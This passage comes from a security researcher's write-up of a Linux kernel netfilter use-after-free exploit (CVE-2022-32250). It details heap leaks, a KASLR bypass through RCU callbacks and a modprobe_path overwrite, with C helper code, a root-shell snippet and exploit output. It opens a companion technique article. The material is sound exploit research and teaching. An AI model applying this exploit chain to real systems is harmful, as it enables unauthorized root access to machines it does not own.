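    /* Step 4: read the fake object back and pick up the pointer. */
    memcpy(&leaked, (unsigned char *)slot1 + 0x18, sizeof(leaked));
    return leaked;
}
```

Subtracting 0x18 from the returned value gives the start of Object 2.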


We have now established our methodology for the heap leak. It is time to find a primitive that we can use for Fake Object 1.

Searching for a primitive 
Objects used in the POSIX message queue filesystem have commonly been used as primitives due to the high degree of control we possess over them. For example, the msg_msg could have been a candidate here - we can control its size and reading memory with it is easy.
/* one msg_msg structure for each message */
struct msg_msg {
	struct list_head m_list; 
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};

However, the header of msg_msg is six 8-byte words or 48 bytes. This means that binding.next (at offset 0x18) won’t overlap with the readable section (the actual message section) but with m_ts.
/* ipc/msgutil.c */
static struct msg_msg *alloc_msg(size_t len)
{
	struct msg_msg *msg;
	struct msg_msgseg **pseg;
	size_t alen;

	alen = min(len, DATALEN_MSG);
	msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT); // [1]
	...
	return msg;

out_err:
	free_msg(msg);
	return NULL;
}

At [1] we can see that msg_msg gets allocated with the flag GFP_KERNEL_ACCOUNT and that is another reason why it is not viable as a primitive.

struct user_key_payload 
A viable primitive was found in the form of user_key_payload. It belongs to the kernel’s key management facility. It holds the payload for keys of type user and logon.
/* include/keys/user-type.h */
struct user_key_payload {
	struct rcu_head	rcu;		/* RCU destructor */ // @0 - 16 bytes
	unsigned short	datalen;	/* length of this data */ // @16 - 2 bytes
	char		data[] __aligned(__alignof__(u64)); /* actual data */ // @24
};

/* include/linux/types.h
 * struct callback_head - callback structure for use with RCU and task_work
 * @next: next update requests in a list
 * @func: actual update function to call after the grace period.
 * ...
 */
struct callback_head {
	struct callback_head *next;
	void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));
#define rcu_head callback_head

Let’s take a look at the function responsible for allocating user_key_payload.
/* security/keys/user_defined.c */
int user_preparse(struct key_preparsed_payload *prep)
{
	struct user_key_payload *upayload;
	size_t datalen = prep->datalen;

	if (datalen <= 0 || datalen > 32767 || !prep->data)
		return -EINVAL;

	upayload = kmalloc(sizeof(*upayload) + datalen, GFP_KERNEL); // [1]
	if (!upayload)
		return -ENOMEM;

	/* attach the data */
	prep->quotalen = datalen;
	prep->payload.data[0] = upayload;
	upayload->datalen = datalen;
	memcpy(upayload->data, prep->data, datalen);
	return 0;
}
EXPORT_SYMBOL_GPL(user_preparse);

At [1] we can see that the allocation is performed with GFP_KERNEL flag therefore it is a viable primitive. Let’s take a look at how it overlaps with nft_expr[nft_lookup].
nft_expr that holds nft_lookup | user_key_payload
=================================================
0x0: *ops                      | rcu_head.next
0x8: *set                      | rcu_head.func
0x10: sreg/dreg/invert         | datalen
0x18: binding.next             | data[0]
0x20: binding.prev             | data[8]

We can see here that binding.next of nft_lookup overlaps with data[0] of user_key_payload. This suits our purposes as the value of binding.next will be written in data[0:8].

So now our exploitation strategy is:

  Add a lookup expression (Obj 1) so it gets bound and then freed.
  Add a user key (Fake Obj 1) with payload size such that it would get allocated in kmalloc-64 and where the UAF’d expression was.
  Add another lookup expression (Obj 2) that looks up into the same set. This would populate binding->next of Obj 1. However Obj 1 got UAF’d so the address of Obj 2 will get written into the data portion of Fake Obj 1 that is of type user_key_payload.
  Read Fake Obj 1 and leak the address of Obj 2.
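On the userspace side, steps 2 and 4 boil down to the add_key and keyctl syscalls. The sketch below wraps them with raw syscall invocations (glibc ships no wrappers for them) and adds a helper that checks whether a payload length puts user_key_payload into a 64-byte object, based on the 24-byte header shown above. The wrapper and helper names are mine, and the description string passed by the caller is arbitrary.

```c
#include <assert.h>
#include <stddef.h>
#include <linux/keyctl.h>
#include <sys/syscall.h>
#include <unistd.h>

/* rcu_head (16) + datalen (2) + padding up to the 8-byte aligned data[]. */
#define UKP_HEADER_SIZE 24

/* 1 if a payload of this length makes the allocation land in kmalloc-64,
 * i.e. the total size is above 32 and at most 64 bytes. */
int fits_kmalloc64(size_t datalen)
{
    size_t total = UKP_HEADER_SIZE + datalen;

    return total > 32 && total <= 64;
}

/* Allocate a "user" key in the process keyring; returns the key id or -1. */
long spray_user_key(const char *description, const void *payload, size_t len)
{
    return syscall(SYS_add_key, "user", description, payload, len,
                   (long)KEY_SPEC_PROCESS_KEYRING);
}

/* Read the payload of a key back; returns the payload length or -1. */
long read_user_key(long key_id, void *buf, size_t len)
{
    return syscall(SYS_keyctl, (long)KEYCTL_READ, key_id, buf, len);
}
```

A payload between 9 and 40 bytes satisfies fits_kmalloc64, and since the pointer is written over data[0:8], the first eight bytes returned by read_user_key are the ones to look at.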


Defeating KASLR 
After leaking a heap address our next goal is to leak a .text address to defeat KASLR. 
During this stage, we are going to be leveraging the message queue subsystem of the kernel as well as the in-kernel key management and retention facility.

Technique 
The technique we are going to use to defeat KASLR is explained in detail in my article Abusing RCU callbacks with a Use-After-Free read to defeat KASLR.

The technique in a nutshell as I introduce it in the article is:

  The technique is possible when we control two objects allocated next to each other in the same slab cache. We must be able to read out-of-bounds through the first object while the second object must have a rcu_head as its first member.
If we make a call to update the second object the kernel will call call_rcu which will populate rcu_head->func(). Then if we can read OOB through the first object into the second object’s rcu_head without sleeping (as to not let the kernel execute rcu_head->func() which will free the memory and maybe zero it out if sensitive) we will be able to leak the address in rcu_head->func() therefore defeating KASLR.


Leaking an address 
We are going to trigger an allocation of an expression that gets UAF’d (Object 1). We make a call to the message queue subsystem to create a message queue. This will result in the allocation of a posix_msg_tree_node object (Fake Object 1). The posix_msg_tree_node has to be allocated at the same location where Object 1 that got UAF’d was allocated.
struct posix_msg_tree_node {
    struct rb_node      rb_node; // of size 0x18 = 24 bytes
    struct list_head    msg_list; // @24 (is 16 bytes)
    int         priority; // @40
};

struct rb_node {
    unsigned long  __rb_parent_color;
    struct rb_node *rb_right;
    struct rb_node *rb_left;
} __attribute__((aligned(sizeof(long))));

The msg_list of posix_msg_tree_node is at offset 24 = 0x18 bytes from the start - the same as the list_head of the nft_set_binding of the nft_lookup expression.
nft_expr that holds nft_lookup | posix_msg_tree_node
====================================================
0x0: *ops                      | __rb_parent_color
0x8: *set                      | *rb_right
0x10: sreg/dreg/invert         | *rb_left
0x18: binding.next             | msg_list.next
0x20: binding.prev             | msg_list.prev

This would mean that the address of the binding of any new lookup expression will be written at offset 0x18 of the posix_msg_tree_node which is msg_list.next. This gives us a primitive with which we can fool the kernel that an object is a message (struct msg_msg) and fetch it - potentially leaking any addresses and pointers stored in the object.

  msg_msg gets allocated with GFP_KERNEL_ACCOUNT and therefore couldn’t be in the same slab cache (KMALLOC_NORMAL) as our nft_lookup expressions. However, that doesn’t stop us from fooling the kernel that an object that is in a KMALLOC_NORMAL cache is actually of type msg_msg - which is exactly what we are doing.


struct msg_msg {
	struct list_head m_list; // @0
	long m_type; // @16
	size_t m_ts;		/* message text size */ // @24
	struct msg_msgseg *next; // @32
	void *security; // @40
	/* the actual message follows immediately */
	/* the size can be up to 16 bytes while staying under 64 */
};

Looking at msg_msg we can see that the list_head of the object is right at the beginning of the object. This is in contrast to nft_expr[nft_lookup] where it is at offset 24 bytes. This is significant as the kernel believes that the address at posix_msg_tree_node.msg_list.next will be that of a msg_msg object (where the list_head is at the beginning). Instead, the kernel will find the address of an expression’s binding. Therefore the kernel will calculate incorrectly where the object starts resulting in an out-of-bounds read. This leaves us with an OOB read primitive that can be used to leak up to 16 bytes from the next slab object satisfying the first condition of the technique.
(Take a look at the table for clarity)

nft_expr[nft_lookup]   | msg_msg
======================================================
0x0: *ops              | 
0x8: *set              |
0x10: sreg/dreg/invert | 
0x18: binding.next     | m_list.next
0x20: binding.prev     | m_list.prev
0x28: ...              | m_type
0x30: ...              | m_ts
0x38: ...              | *next
======== Going outside the 64 byte slab object =======
0x40:                  | *security
0x48:                  | msg[0]
0x50:                  | msg[1]
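The arithmetic behind the table is small enough to spell out. Given the address of the 64-byte object holding the lookup expression, the helper below computes where the kernel believes the msg_msg starts and where its security pointer and message text end up. The constants come from the struct layouts shown above; the type and function names are invented for the sketch.

```c
#include <assert.h>
#include <stdint.h>

#define BINDING_OFFSET      0x18  /* binding.list inside the expression */
#define MSG_SECURITY_OFFSET 40    /* msg_msg.security */
#define MSG_TEXT_OFFSET     48    /* first byte of the message text */

struct fake_msg_view {
    uint64_t msg_start;      /* where the kernel thinks msg_msg begins */
    uint64_t security_addr;  /* address read as msg_msg->security */
    uint64_t text_addr;      /* address of the first message byte */
};

/* m_list is the first member of msg_msg, so the kernel treats the address
 * of the binding itself as the start of the message. */
struct fake_msg_view view_as_msg(uint64_t object_addr)
{
    struct fake_msg_view v;

    v.msg_start     = object_addr + BINDING_OFFSET;
    v.security_addr = v.msg_start + MSG_SECURITY_OFFSET;
    v.text_addr     = v.msg_start + MSG_TEXT_OFFSET;
    return v;
}
```

For an object at address X this yields X + 0x40 for the security pointer and X + 0x48 for the message text, both inside the neighbouring slab object.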


As we already established: the second lookup expression (let it be called Object 2) we allocate will be treated as the first message in a message queue. However, to have a successful read via the message queue system - we need to be able to set the parameters of msg_msg. In order to do that we would need to UAF Object 2 and allocate another object in its place (Fake Object 2).
struct user_key_payload {
	struct rcu_head	rcu;		/* RCU destructor */
	unsigned short	datalen;	/* length of this data */
	char		data[] __aligned(__alignof__(u64)); /* actual data */
};

The type of Fake Object 2 will once again be user_key_payload as it gets allocated with GFP_KERNEL and we can use it to write the parameters of the fake msg_msg by writing to data. This way we can set the m_type and m_ts of the fake message (we also have to write valid pointers into m_list->next and m_list->prev).

nft_expr[nft_lookup]   | user_key_payload | msg_msg
======================================================
0x0: *ops              | rcu.next         | 
0x8: *set              | rcu.func         |
0x10: sreg/dreg/invert | datalen          |
0x18: binding.next     | data[0]          | m_list.next
0x20: binding.prev     | data[1]          | m_list.prev
0x28: ...              | data[2]          | m_type
0x30: ...              | data[3]          | m_ts
0x38: ...              | data[4]          | *next
======== End of Object 2 ; Object 3 follows ==========
0x8:                   |                  | *security
0x10:                  |                  | msg[0]
0x18:                  |                  | msg[1]

Here the first column represents the nft_lookup expression that gets UAF’d. The second column is the object that gets allocated over the object that got UAF’d while the third column shows how the kernel is going to treat the object (as a msg_msg object that is offset by 24 = 0x18 bytes).
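
As a rough illustration of the second column, the payload bytes could be laid out as below. This is a sketch under assumptions: build_fake_msg and its parameter names are hypothetical, and setting the *next slot to 0 (no further message segments) is my assumption rather than something taken from the PoC.

```c
#include <stdint.h>
#include <string.h>

#define FAKE_MSG_WORDS 5  /* data[0]..data[4] in the table above */

/*
 * Fill the key payload so that, read at [Object 2] + 0x18, it looks like
 * a msg_msg header. All argument names are illustrative.
 */
static void build_fake_msg(uint8_t out[FAKE_MSG_WORDS * 8],
			   uint64_t list_next, uint64_t list_prev,
			   uint64_t m_type, uint64_t m_ts)
{
	const uint64_t words[FAKE_MSG_WORDS] = {
		list_next,  /* data[0] -> m_list.next */
		list_prev,  /* data[1] -> m_list.prev */
		m_type,     /* data[2] -> m_type */
		m_ts,       /* data[3] -> m_ts */
		0,          /* data[4] -> *next (assumed: no segments) */
	};

	memcpy(out, words, sizeof(words));
}
```

The resulting 40-byte buffer is what would be passed as the payload when creating the user key, so that it lands in data[] starting at offset 0x18 of the slab object.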

Whenever a call to fetch a message is made the function do_mq_timedreceive gets called. At the end of the function, as the msg_msg object is about to get freed, a call to free msg_msg->security is made - so in order for the message fetch to succeed there must be a valid heap address at offset 40 = 0x28 bytes of the msg_msg. Therefore we need to make sure that there is indeed a heap address at that location. We must also note that due to the nature of the OOB read the *security pointer would be at offset 64 = 0x40 bytes from the start of Object 2 - right at the beginning of the next slab object as you can see above (this is due to the 24-byte offset of the read).

We are going to leak KASLR through the object we allocate right under Object 2 / Fake Object 2. A perfect object for this task is once again… user_key_payload - the main character of our write-up. 
The first member of user_key_payload is a rcu_head/callback_head.
struct callback_head {
	struct callback_head *next; // @0
	void (*func)(struct callback_head *head); // @8 rcu_head->func 
} __attribute__((aligned(sizeof(void *))));
#define rcu_head callback_head

The first member of the callback_head is a pointer (callback_head->next) that will be treated as msg_msg->security and the second member is a function pointer that will overlap with msg[0]. Therefore if we make a call to read the message we will be able to read that function pointer and leak KASLR.

However, there is an issue: both callback_head->next and callback_head->func will be null by default. In order to populate them we must make a call to change the payload (Object 3). This is due to the way RCU callbacks work - when a call is made to change an RCU-protected object call_rcu is invoked.

  The call_rcu() API is a callback form of synchronize_rcu().  Instead of blocking, it registers a function and argument which are invoked after all ongoing RCU read-side critical sections have completed. This callback variant is particularly useful in situations where it is illegal to block or where update-side performance is critically important.


The function at callback_head->func will be executed by the kernel when it is safe to do so. In the case of updating a user_key_payload the callback function will be user_free_payload_rcu which will free and zero out Object 3.
static void user_free_payload_rcu(struct rcu_head *head)
{
	struct user_key_payload *payload;

	payload = container_of(head, struct user_key_payload, rcu);
	kfree_sensitive(payload);
}

So leaking callback_head->func is essentially a race against the kernel - trying to read it and leak it before the kernel zeroes it out.

I go over the technique in more detail in my article Abusing RCU callbacks with a Use-After-Free read to defeat KASLR.

Summarizing the KASLR leak process: 

  Allocate a nft_lookup expression (Object 1) such that it causes a UAF.
  Initiate a message queue in order to allocate a posix_msg_tree_node (Fake Object 1) at the location of Object 1.
  Spray user_key_payload objects and then randomly free a few to create a bunch of gaps in the cache so Object 2 gets allocated in between them.
  Add a new nft_lookup expression (Object 2) such that it causes a UAF. The address of this expression’s binding ([Object 2] + 0x18) will be written into the msg_list.next of the posix_msg_tree_node. Now if a message is fetched from the message queue the kernel will target [Object 2] + 0x18 to get the message (msg_msg). We also hope that this object would have been allocated such that the object immediately below it is a user_key_payload (and this is why we spray a lot of them in step 3).
  Allocate a user_key_payload (Fake Object 2) at the location of Object 2. Write into the payload the parameter values we want our fake msg_msg at [Object 2] + 0x18 to have. We write values for m_list.next, m_list.prev, m_type and m_ts.
  Mass update all the user_key_payload objects to populate the rcu_head members.
  Make a call to fetch the first message from a message queue. This should leak a kernel address, defeating KASLR (if we won the race against the kernel to leak rcu_head->func before it got zeroed out).
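
Once the function pointer is leaked, turning it into a kernel base is plain subtraction. A minimal sketch follows; the helper names are hypothetical, and the offset 0x54bef0 is simply kaddr - kbase from the sample run in the Proof-of-Concept section, so it is specific to that kernel build.

```c
#include <stdint.h>

/*
 * Offset of the leaked callback from the kernel base. 0x54bef0 is taken
 * from the sample run in this write-up; it is build-specific and must be
 * re-derived for any other kernel image.
 */
#define LEAKED_FUNC_OFFSET 0x54bef0ULL

static uint64_t kernel_base_from_leak(uint64_t leaked_func)
{
	return leaked_func - LEAKED_FUNC_OFFSET;
}

/* Address of any other symbol once the base is known. */
static uint64_t kernel_symbol(uint64_t kbase, uint64_t symbol_offset)
{
	return kbase + symbol_offset;
}
```

The same kernel_symbol helper would then give the runtime address of modprobe_path, given its offset in the target image.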


Escalating via a modprobe_path overwrite 
An easy way to achieve Local Privilege Escalation is by overwriting the modprobe_path of the kernel.
modprobe is used to load kernel modules from userspace. A common usage of it is to load the necessary module needed to execute a binary with an uncommon binary header. 
The location of modprobe is stored in the modprobe_path symbol. It is possible for us to overwrite modprobe_path as it is stored in the .data segment (which is read/write and variables stored in there can be altered at run time).

Method of Exploitation 
Our goal is to make modprobe_path point to an executable that we control - let’s call that fake_modprobe.

As we already established, modprobe is executed in order to load a kernel module needed to handle the execution of a binary of an uncommon type. We can set up a trigger binary with an unknown binary header which, when executed, will force the kernel to execute modprobe in order to attempt to load an appropriate kernel module to handle trigger. But instead of modprobe being run, fake_modprobe will be executed as root.

The fake_modprobe executable can be a simple script that changes the ownership of a get_shell executable to root and sets its SUID and SGID bits. In this case, get_shell just does:
setuid(0);
setgid(0);
system("/bin/sh");

The process summarized:

  Overwrite modprobe_path to /path/to/fake_modprobe
  Execute a trigger binary with an unknown binary header.
  The kernel executes fake_modprobe in an attempt to load the needed modules to execute trigger which instead changes the ownership and permissions of get_shell.
  Execute get_shell to escalate privileges.
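
Creating the trigger file could look roughly like this. It is a sketch, not the PoC code: write_executable and write_trigger are hypothetical helper names, and the four 0xff bytes are just one common choice of a header that no binary format handler recognises.

```c
#include <stdio.h>
#include <sys/stat.h>

/* Write `len` bytes to `path` and mark the file executable (0755). */
static int write_executable(const char *path, const void *data, size_t len)
{
	FILE *f = fopen(path, "wb");

	if (!f)
		return -1;
	if (fwrite(data, 1, len, f) != len) {
		fclose(f);
		return -1;
	}
	if (fclose(f) != 0)
		return -1;
	return chmod(path, 0755);
}

/* A file whose first bytes match no known binary format. Executing it
 * is what makes the kernel go looking for a module via modprobe_path. */
static int write_trigger(const char *path)
{
	static const unsigned char unknown_magic[4] = { 0xff, 0xff, 0xff, 0xff };

	return write_executable(path, unknown_magic, sizeof(unknown_magic));
}
```

The same write_executable helper can drop the fake_modprobe script at the path that ends up in modprobe_path; running the trigger afterwards is expected to fail, which is fine since only the side effect matters.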


Overwriting modprobe_path 
When a call to fetch a message is made the function do_mq_timedreceive gets executed which itself makes a call to msg_get to get the highest priority message from a queue.
static inline struct msg_msg *msg_get(struct mqueue_inode_info *info)
{
	struct rb_node *parent = NULL;
	struct posix_msg_tree_node *leaf;
	struct msg_msg *msg;

try_again:
	/*
	 * During insert, low priorities go to the left and high to the
	 * right.  On receive, we want the highest priorities first, so
	 * walk all the way to the right.
	 */
	parent = info->msg_tree_rightmost;
	if (!parent) {
		if (info->attr.mq_curmsgs) {
			pr_warn_once("Inconsistency in POSIX message queue, "
				     "no tree element, but supposedly messages "
				     "should exist!\n");
			info->attr.mq_curmsgs = 0;
		}
		return NULL;
	}
	leaf = rb_entry(parent, struct posix_msg_tree_node, rb_node);
	if (unlikely(list_empty(&leaf->msg_list))) {
		pr_warn_once("Inconsistency in POSIX message queue, "
			     "empty leaf node but we haven't implemented "
			     "lazy leaf delete!\n");
		msg_tree_erase(leaf, info);
		goto try_again;
	} else {
		msg = list_first_entry(&leaf->msg_list,
				       struct msg_msg, m_list);
		list_del(&msg->m_list); // [1] <---------------------
		if (list_empty(&leaf->msg_list)) {
			msg_tree_erase(leaf, info);
		}
	}
	info->attr.mq_curmsgs--;
	info->qsize -= msg->m_ts;
	return msg;
}

At [1] we can see that list_del is used to remove the message (msg_msg) from the linked list of messages in the queue.

list_del deletes a list entry by making the prev/next entries point to each other.
static inline void __list_del(struct list_head * prev, struct list_head * next)
{
	next->prev = prev; // [1]
	WRITE_ONCE(prev->next, next); // [2]
}

The instruction at [1] will write prev into next+0x8 while the instruction at [2] will write next into prev.
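
To see the two stores in isolation, here is a small userspace sketch of the unlink. The function names are hypothetical; the logic mirrors __list_del but leaves out WRITE_ONCE and the pointer poisoning that the kernel’s list_del performs afterwards.

```c
#include <stddef.h>

struct list_head { struct list_head *next, *prev; };

/* Same two stores as the kernel's __list_del(), without WRITE_ONCE(). */
static void list_unlink(struct list_head *prev, struct list_head *next)
{
	next->prev = prev;  /* store at (char *)next + offsetof(prev) */
	prev->next = next;  /* store at (char *)prev + offsetof(next) */
}

/* Unlink `entry` the way list_del() does, minus the pointer poisoning. */
static void list_del_sketch(struct list_head *entry)
{
	list_unlink(entry->prev, entry->next);
}
```

Since the prev member sits one pointer (8 bytes on 64-bit) into list_head and next sits at offset 0, whoever controls entry->next and entry->prev controls both the destination and the value of each store.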

We introduced in the KASLR bypass section of this write-up a way to fool the kernel that an object is a msg_msg - with the ability to set the members of the fake msg_msg to the values we want.
nft_expr[nft_lookup]   | user_key_payload | msg_msg
======================================================
0x0: *ops              | rcu.next         | 
0x8: *set              | rcu.func         |
0x10: sreg/dreg/invert | datalen          |
0x18: binding.next     | data[0]          | m_list.next
0x20: binding.prev     | data[1]          | m_list.prev
0x28: ...              | data[2]          | m_type
0x30: ...              | data[3]          | m_ts
0x38: ...              | data[4]          | *next
=====================================================
0x8:                   |                  | *security
0x10:                  |                  | msg[0]
0x18:                  |                  | msg[1]

We can use a user_key_payload object to set up the fake msg_msg exactly how we want it - including setting m_list.next and m_list.prev to any value we want. We can therefore take advantage of the list_del function - letting it write to modprobe_path for us. To do that we would need to set m_list.prev to the value we want modprobe_path to hold and set m_list.next to modprobe_path - 0x7 (as it writes prev into next+0x8 and we want to counteract this offsetting while still leaving the / at the beginning of the existing modprobe_path).

An interesting caveat though is that the value we write to m_list.prev (which is going to serve as the path written in modprobe_path) must also be a valid address that the kernel is able to write to, since the store at [2] writes next to the address held in prev - this however is not a problem as we leaked the heap base earlier and can build an address-like path that is valid.
// excerpt from my Proof-of-Concept
uint64_t modprobe_path = heap_base + 0x2f706d74; // 0x2f706d74 = tmp/ (but little endian)

This would result in modprobe_path being changed to /tmp/<2 bytes of entropy>\xff\xffprobe (the 2 bytes of entropy here belong to the heap base we leaked, and the trailing probe is what remains of the original /sbin/modprobe).
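
The effect of that single 8-byte store on the string can be modelled in userspace. This is a sketch only: apply_unlink_write is a hypothetical helper that writes the bytes least significant first, the way a little-endian x86-64 store would, into a local copy of the path.

```c
#include <stdint.h>

/*
 * Model of the store `next->prev = prev` when next = modprobe_path - 0x7:
 * the 8 bytes of `prev` land at modprobe_path + 1, least significant
 * byte first (x86-64 is little endian).
 */
static void apply_unlink_write(char *path_buf, uint64_t prev)
{
	for (int i = 0; i < 8; i++)
		path_buf[1 + i] = (char)(unsigned char)((prev >> (8 * i)) & 0xff);
}
```

Feeding it a buffer holding /sbin/modprobe and the value heap_base + 0x2f706d74 leaves the leading / untouched, replaces the next eight bytes with tmp/ plus the upper half of the heap base, and keeps the final probe.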

Now it is a matter of placing the fake modprobe at this path and executing the trigger binary.

Proof-of-Concept 
The PoC is available at https://github.com/ysanatomic/CVE-2022-32250-LPE.

# ./exploit
[*] CVE-2022-32250 LPE Exploit by @YordanStoychev

uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
[*] Setting up user+network namespace sandbox

uid=0(root) gid=0(root) groups=0(root)

[+] STAGE 1: Heap leak
[*] Socket is opened.
[*] Table table1 created.
[*] Socket is opened.
[*] Table table2 created.
[*] Socket is opened.
[*] Table table3 created.
[*] Set created
[*] Set with UAF'd expression created
[*] Set with UAF'd expression created
[&] heap_addr: 0xffff91d97f89f398
[&] heap_base: 0xffff91d900000000

[+] STAGE 2: KASLR bypass
[*] Set created
[*] Set with UAF'd expression created
[*] Set with UAF'd expression created
[&] kaddr: 0xffffffff9f54bef0
[&] kbase: 0xffffffff9f000000

[+] STAGE 3: modprobe_path overwrite
[*] Set created
[*] Set with UAF'd expression created
[*] Set with UAF'd expression created

[*] STAGE 4: Escalation
[*] Setting up the fake modprobe...
[*] modprobe_path: /tmp/ّprobe
[*] Setting up the shell...
[*] Triggering the modprobe...
[*] Executing shell...
/ #


Closing Remarks 
Analysing and Exploiting this vulnerability was lots of fun. Initially, I planned to do everything from analysing it to making the exploit live on stream but I started doing more and more off-stream and then I just finished it up off-stream. I might make one last stream/video where I go over the final exploit in detail.

Took me some time to sit down and finish up the write-up - but better late than never.

If you have any questions feel free to hit me up on Twitter or by email.


Abusing RCU callbacks with a Use-After-Free read to defeat KASLR
2023-01-04T14:00:00+00:00
Introduction
In this article, I will be walking you through a clever technique that can be used to leak addresses and defeat KASLR in the Linux Kernel when you have a certain type of Use-After-Free by abusing RCU callbacks. It is by no means a novel technique and has most likely been leveraged in several exploits.

This is a guide meant to give you a solid understanding of the technique as quickly as possible.

  This article was supposed to come out 2 weeks ago but it was delayed due to the Christmas holidays.


Table of Contents

  The Technique in a nutshell
  Criteria
    A certain type of Use-After-Free
    A specific OOB read
    Ability to spray objects
  Analysis
    Read Primitive
      user_key_payload
      posix_msg_tree_node
      msg_msg
    Frankensteining everything together
  Resources
  Summary


The Technique in a nutshell 
The technique is possible when we control two objects allocated next to each other in the same slab cache. We must be able to read out-of-bounds through the first object while the second object must have an rcu_head as its first member.

If we make a call to update the second object the kernel will call call_rcu which will populate rcu_head->func. Then if we can read OOB through the first object into the second object’s rcu_head without sleeping (so as not to let the kernel execute rcu_head->func() which will free the memory and maybe zero it out if sensitive) we will be able to leak the address in rcu_head->func, therefore defeating KASLR.

Now that we have a general summary of the technique it is time to go more in-depth.

Criteria 
We have some criteria that have to be met to be able to use this technique.

A certain type of Use-After-Free 
This technique applies to objects that meet the following requirements:

  The object that gets UAF’d must be in a linked list.
  The list_head of the object must be at offset 16 bytes or more relative to the start of the object.
  You must be able to get multiple objects that get UAF’d in a linked list with one another.


A specific OOB read 
We need to have a primitive capable of reading at least 16 bytes out-of-bounds of the slab object. However, it is important to mention that read sizes cannot go over the size limit of the slab cache. So if you are reading from an object in kmalloc-64 you can read up to 64 bytes before the kernel detects the memory leak if the option CONFIG_HARDENED_USERCOPY is on (and chances are it is on the target). This means that your read needs to start at an offset of at least 16 bytes from the start of the slab object to be able to read 16 bytes out-of-bounds.


  Ex: If you have a kmalloc-64 slab object that occupies the address space from address 0x20 to address 0x60, your read must start at address 0x30 (offset 0x10 into the object) to be able to read 16 bytes out-of-bounds of the slab object (up to 0x70).
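
The arithmetic behind this requirement fits in one helper. A minimal sketch, with oob_bytes being a hypothetical name and the read length cap taken to be the slab object size as described above:

```c
#include <stddef.h>

/*
 * Bytes that land past the end of a slab object when a read of at most
 * `max_read` bytes starts `start_off` bytes into an object of `obj_size`.
 */
static size_t oob_bytes(size_t obj_size, size_t start_off, size_t max_read)
{
	size_t end = start_off + max_read;

	return end > obj_size ? end - obj_size : 0;
}
```

For kmalloc-64 with a 64-byte cap, a read starting at offset 0 never leaves the object, one starting at offset 0x10 reaches 16 bytes into the neighbour, and one starting at offset 24 reaches 24 bytes into it.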


It might be a little difficult to find OOB read primitives like this but they exist even if somewhat conditionally (those OOB reads could only be achieved if the previous conditions about the type of Use-After-Free are met). More on that later.

Ability to spray objects 
We need to be able to spray objects that have rcu_head as their first member. We must also be able to ‘update’ those objects.


  The objects that will be sprayed must be allocated with the same GFP flag as the primitive that is used for reading. Otherwise, they won’t be allocated in the same caches.


Analysis 
I will provide a simple (fake) example case and go over how the technique could be applied.

  For a real case where this technique is used: I have a write-up coming out soon of a vulnerability where I use this very trick to leak an address and bypass KASLR.


Let’s have a type vuln_obj
struct vuln_obj {
	uint64_t int1; // @0
	uint64_t int2; // @8
	uint64_t int3; // @16
	struct list_head list; // @24 - matches the requirement for the list_head 
	unsigned char data[16]; // @40
};

We can freely make calls to the kernel that will allocate this structure with the flag GFP_KERNEL. All objects of this type are allocated in kmalloc-64 and all objects of this type are in a linked list together. We can also make calls to free structures of this type. However, the kernel does not unlink the object that gets freed from the linked list.

This is our vulnerability: a vuln_obj object gets freed but it is not removed from the linked list and the previous and next objects in the list hold pointers to it. This causes a Use-After-Free and vuln_obj meets all the criteria we set prior.
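
The bug pattern can be mimicked in userspace without touching freed memory by using a toy slot allocator. Everything here is hypothetical scaffolding for the fake example: the pool, other_obj and the function names are stand-ins, and handing out the lowest free slot is only a crude approximation of how a real slab cache reuses objects.

```c
#include <stddef.h>
#include <stdint.h>

struct list_head { struct list_head *next, *prev; };

struct vuln_obj {
	uint64_t int1, int2, int3;  /* @0, @8, @16 */
	struct list_head list;      /* @24 */
	unsigned char data[16];     /* @40 */
};

/* Stand-in for whatever object is allocated over the freed vuln_obj. */
struct other_obj {
	uint64_t header[3];         /* @0 */
	struct list_head list;      /* @24: overlaps vuln_obj.list */
};

/* Toy allocator: four slots, always hands out the lowest free one. */
union slot { struct vuln_obj v; struct other_obj o; };
static union slot pool[4];
static int in_use[4];

static union slot *slot_alloc(void)
{
	for (int i = 0; i < 4; i++) {
		if (!in_use[i]) {
			in_use[i] = 1;
			return &pool[i];
		}
	}
	return NULL;
}

static void list_add_tail_sketch(struct list_head *entry, struct list_head *head)
{
	entry->prev = head->prev;
	entry->next = head;
	head->prev->next = entry;
	head->prev = entry;
}

/* The bug: the slot goes back to the allocator, the list entry stays. */
static void vuln_obj_free_buggy(union slot *s)
{
	in_use[s - pool] = 0;
	/* missing: unlinking s->v.list from its neighbours */
}
```

After vuln_obj_free_buggy the list head still points 24 bytes into the slot, so whatever gets allocated there next has the bytes at its own offset 24 treated as a list entry.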

Read Primitive 
Now that we have introduced our example vulnerable object we need to look for a read primitive that matches the conditions we set earlier.

A primitive like that won’t be found just lying around - we need to work a bit to get it. Our vuln_obj is allocated in kmalloc-64 so we are looking for objects that get allocated in that slab cache. In this example, we are going to be leveraging objects belonging to the in-kernel key management and retention facility and the message queue system of the kernel.

user_key_payload 
Objects of type user_key_payload hold the payload of user and logon keys. This type plays the main role in our story.
/* include/keys/user-type.h */
struct user_key_payload {
	struct rcu_head	rcu;		/* RCU destructor */ // @0 - 16 bytes
	unsigned short	datalen;	/* length of payload */ // @16 - 2 bytes
	char		data[] __aligned(__alignof__(u64)); /* actual payload */ // @24
};

struct callback_head {
	struct callback_head *next; // @0
	void (*func)(struct callback_head *head); // @8 rcu_head->func 
} __attribute__((aligned(sizeof(void *))));
#define rcu_head callback_head

This object will be the one we will leak KASLR through (by reading the rcu.func pointer at offset 8 bytes).

posix_msg_tree_node 
In the message queue subsystem, all the messages (struct msg_msg) belonging to a certain queue are in a linked list together. The start (the root) of the queue is a struct posix_msg_tree_node.
struct posix_msg_tree_node {
    struct rb_node      rb_node; // of size 0x18 = 24 bytes
    struct list_head    msg_list; // @24 (is 16 bytes)
    int         priority; // @40
};

struct rb_node {
    unsigned long  __rb_parent_color;
    struct rb_node *rb_right;
    struct rb_node *rb_left;
} __attribute__((aligned(sizeof(long))));

It is allocated with the GFP_KERNEL flag and as such will be allocated in the same caches as our vuln_obj.

  However interestingly enough messages in the queue are allocated with the flag GFP_KERNEL_ACCOUNT and reside in the kmalloc-cg-n caches. So in our case msg_msg is not a viable primitive.


We do not possess direct control over objects of this type but we can freely allocate them by creating message queues.

  Technically the posix_msg_tree_node for each queue gets initiated whenever the first message is added to the queue and not when the queue is created.


